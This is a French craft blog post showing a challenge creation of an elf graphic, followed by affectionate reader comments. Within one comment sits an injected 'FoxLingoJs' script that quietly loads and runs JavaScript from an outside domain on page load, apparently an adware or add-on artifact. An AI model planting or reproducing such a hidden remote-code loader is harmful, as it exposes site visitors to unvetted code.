• lutin

    defi lutin lancé de jade :  tube imposé le lutin et le  reste fait a mon idee

    sous mon pseudo petite fleur :

     

    Hebergeur d'image

    et sur cette crea le tube femme etait imposée .. Hebergeur d'image


  • Commentaires

    1
    Lundi 19 Novembre 2012 à 23:47

    coucou merci beaucoup pour ton gentil pti mot deposer chez moi

    ton univers est vraiment tres beau !!! j'adore !

    passe une bonen nuit

     amitié féeline

    2
    Lundi 26 Novembre 2012 à 12:39

    hebergeur d'image

    coucou ma douce , les soucis de ma connexion sfr grrrr m'ont privé de vous tous bien longtemps et encore pas de telephone pour le moment!!!

    passe un bon lundi et une bonne semaine. .

    je t'envoie toute mon amitié et mille doux bisous

    Si regarder en arrière  te cause du chagrin  et regarder en avant t' inspire de la crainte,  alors regarde à coté de toi,  J'y  suis"
        
    Le bonheur te garde gentil

    Les  épreuves te gardent fort

    Les chagrins te  gardent humain

    Les échecs te gardent humble

    Mais seul l'espoir te fait avancer.

    3
    angelique 63 Profil de angelique 63
    Mardi 27 Novembre 2012 à 09:22

    Bonjour Mounette,

    Aujourd'hui je passe avec le vent, pour te remercier de ton passage sur mon blog, sa ma fait grand plaisir d'avoir ma reine sortir de son grand chareau!.....MDR

    Je voulais te dire que je suis ravie d'avoir ouvert un compte sur ton forum, c'est mon grand plaisir d'aller dessus et de faire les creations que tu demande.

    Je part une semaine une fois part mois,a l'hôpital et quand je rentre c'est mon plaisir de trouver tes E-MAILS pour faire les défi les créas, pour moi tu es mon dont du ciel.

    Merci encore une fois, gros bisoude ta dévouer petite abeille.

    Angélique 

    4
    Atena Profil de Atena
    Mardi 27 Novembre 2012 à 17:32

    2 merveilleuses creations

    ma  préf est la dernière

    Je te souhaite une belle fin de journée

    5
    Atena Profil de Atena
    Jeudi 29 Novembre 2012 à 09:36

    comme je l'ai dis c'est tres beau!mais j'avoue que ce lutin me fait peur!

    hein!

    il bizarre non!

    lol

    bonne journée a  toi et prend soin de toi

    6
    Pourleplaisir
    Vendredi 7 Décembre 2012 à 14:55

    Félicitation petite fleur pour ces belles créations ,avec tout tes concours tu doit être bien occupée.


    Bisous


    Daniel

    7
    Vendredi 7 Décembre 2012 à 14:58

    kikou ma miss

    8
    Vendredi 7 Décembre 2012 à 18:43

    et bien daniel je suis plus occupée avec mon forum je suis rarement ici parfois je depose des creas que je fais ailleurs !!! je te souhaite un bon week end kissss titeuf

    <script id="FoxLingoJs" type="text/javascript">// <![CDATA[ (function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); // ]]></script>
    9
    Mymy
    Vendredi 4 Avril 2014 à 18:32

    Coucou Hénoa je te retrouve , Dieu que c'est beauuuuuuuu , et toute mes félicitations pour tes magnifique créas , bonne continuation et bisous de mymyhappy

    10
    Mymy
    Vendredi 4 Avril 2014 à 18:34

    Aténa ce lutin , veille lol bisousyes

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :